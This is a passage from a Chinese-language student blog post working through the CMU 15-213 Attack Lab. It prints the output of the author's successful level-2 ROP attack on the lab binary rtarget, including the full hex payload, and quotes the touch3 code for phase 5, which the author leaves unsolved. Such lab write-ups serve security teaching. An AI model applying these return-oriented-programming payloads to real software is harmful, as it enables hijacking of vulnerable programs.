我们测试一下我们的结果./hex2raw < le2.txt | ./rtarget -q
[root@cadc591c8a87 attack]# ./hex2raw < le2.txt | ./rtarget -q Cookie: 0x59b997fa Type string:Touch2!: You called touch2(0x59b997fa) Valid solution for level 2 with target rtarget PASS: Would have posted the following: user id bovik course 15213-f15 lab attacklab result 1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 2B 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 EC 17 40 00 00 00 00 00 2.2 Level3这个是整个实验的第五关。官网上说你到这里已经获得了95分了。如果你不想继续的话就可以停止了。咳咳咳本着求知的目的我们还是把这个实验完成吧。看起来第五关难度应该很大
阶段5要求您对RTARGET进行ROP攻击,以使用指向cookie字符串的指针来调用函数touch3
touch3的代码如下
/* Compare string to hex represention of unsigned value */ int hexmatch(unsigned val, char *sval) { char cbuf[110]; /* Make position of check string unpredictable */ char *s = cbuf + random() % 100; sprintf(s, "%.8x", val); //s=val=cookie return strncmp(sval, s, 9) == 0; //比较cookie和第二个参数的前9位是否相同 // cookie只有8字节。这里为9的原因是我们要比较最后一个是否为'\0' } void touch3(char *sval) { vlevel = 3; /* Part of validation protocol */ if (hexmatch(cookie, sval)) { //相同则成功 printf("Touch3!: You called touch3(\"%s\")\n", sval); validate(3); } else { printf("Misfire: You called touch3(\"%s\")\n", sval); fail(3); } exit(0); }行了最后一点我做不出来了。网上有非常多的参考。这里就不写了。。。(真菜啊我)
Summary除了最后一个实验。其他的只要好好读书,认真理解应该都能够做出来的。最后一个主要是中间隔了太久了。没有想做的欲望了。直接去网上查了别人的这里就不做复制工作了。第四个实验一定会认真做的